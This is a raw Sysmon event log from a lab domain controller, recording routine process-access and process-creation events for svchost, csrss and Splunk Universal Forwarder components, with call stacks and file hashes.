13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8FA2-6005-FC00-00000000A301}4428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FA2-6005-FC00-00000000A301}4428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.006{59A5CD1D-8FA2-6005-FC00-00000000A301}4428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.474{59A5CD1D-8FA3-6005-FD00-00000000A301}17564192C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FA3-6005-FD00-00000000A301}1756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8FA3-6005-FD00-00000000A301}1756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FA3-6005-FD00-00000000A301}1756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.334{59A5CD1D-8FA3-6005-FD00-00000000A301}1756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.770{59A5CD1D-8FA4-6005-FF00-00000000A301}6642752C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FA4-6005-FF00-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 